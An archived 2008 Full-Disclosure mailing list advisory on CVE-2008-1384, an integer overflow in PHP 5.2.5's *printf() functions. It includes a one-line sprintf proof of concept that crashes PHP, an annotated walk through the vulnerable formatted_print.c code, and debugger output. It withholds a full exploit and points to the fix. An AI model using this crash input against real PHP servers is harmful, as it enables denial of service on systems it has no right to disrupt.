lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <b0f1e455ad52b10117fb5f490c8a3e2d.qmail@home.pl>
Date: Fri, 21 Mar 2008 17:18:22 +0100
From: "Maksymilian Arciemowicz" <cxib@...urityreason.com>
To: full-disclosure@...ts.grok.org.uk
Subject: {securityreason.com}PHP 5 *printf() - Integer
	Overflow

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]

Author: Maksymilian Arciemowicz (cXIb8O3)
SecurityReason.com and SecurityReason.pl
Date:
- - Written: 01.03.2008
- - Public: 20.03.2008

SecurityReason Research
SecurityAlert Id: 52

CVE-2008-1384
SecurityRisk: Low

Affected Software: PHP 5.2.5 and prior
Advisory URL:
http://securityreason.com/achievement_securityalert/52
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed 
from C, Java and Perl with a couple of unique PHP-specific features thrown 
in. The goal of the language is to allow web developers to write 
dynamically generated pages quickly.

These functions all manipulate strings in various ways. Some more 
specialized sections can be found in the regular expression and URL 
handling sections.

For information on how strings behave, especially with regard to usage of 
single quotes, double quotes, and escape sequences, see the Strings entry 
in the Types section of the manual.

- --- 1. *printf() functions Integer Overflow ---
The main problem exists in formatted_print.c file.

cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 
UTC 2008     root@...an.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
<?
sprintf("[%'A2147483646s]\n",  "A");
?>
cxib# php /www/printf.php
Segmentation fault (core dumped)

Good. Let's see to formatted_print.c file in php_sprintf_appendstring() 
function

- ---formatted_print.c-start---
inline static void
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,
						   int min_width, int max_width, char padding,
						   int alignment, int len, int neg, int expprec, int always_sign)
- ---formatted_print.c-end---

The main varible what we will see is "npad"


- ---formatted_print.c-start---
	copy_len = (expprec ? MIN(max_width, len) : len);
	npad = min_width - copy_len;
- ---formatted_print.c-end---

good. npad is 2147483646


- ---formatted_print.c-start---
	req_size = *pos + MAX(min_width, copy_len) + 1;
- ---formatted_print.c-end---

	req_size overflow

- ---formatted_print.c-start---
	if (req_size > *size) {
		while (req_size > *size) {
			*size <<= 1;
		}
		PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size));
		*buffer = erealloc(*buffer, *size);
	}
- ---formatted_print.c-end---

(req_size > *size) is False

(alignment == ALIGN_RIGHT) is True so

- ---formatted_print.c-start---
		while (npad-- > 0) {
			(*buffer)[(*pos)++] = padding;
		}
- ---formatted_print.c-end---

and finish. Let's debug it with gdb

- --- Debug ---
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c,
    size=0xbfbfd324, add=0x28f20404 'A' <repeats 200 times>...,
    min_width=2147483646, max_width=0, padding=65 'A', alignment=1, len=1,
    neg=0, expprec=0, always_sign=0)

..

0x290fff0c:      'A' <repeats 200 times>...
0x290fffd4:      'A' <repeats 44 times> <Error reading address 0x29100000: 
Bad address>
0x29100000:      <Error reading address 0x29100000: Bad address>
- --- Debug ---

Script will alocated a lot of data to memory.

Tested on:
PHP 5.2.5
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 
UTC 2008     root@...an.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386

and
PHP 5.1.6
someone@...ra ~ $ uname -a
NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006  

riz@...netbsd.org:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826
Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENE
RIC  sparc64

- --- 2. Exploit ---
SecurityReason will not public official exploit for this issue.

- --- 3. How to fix ---
CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup

- --- 4. Greets ---
sp3x Infospec p_e_a Chujwamwdupe schain and Stanislav Malyshev (Patch)

- --- 5. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg [NEW KEY]
GPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg.old [OLD 
KEY]
http://securityreason.com
http://securityreason.pl

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.4 (FreeBSD)

iD8DBQFH4px5W1OhNJH6DMURAmHUAJ4hUxGFzSo8vqCH5QmR17uL5G4HdACfSFiI
w6hfbKzpzFcipScHzuATSME=
=suIH
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ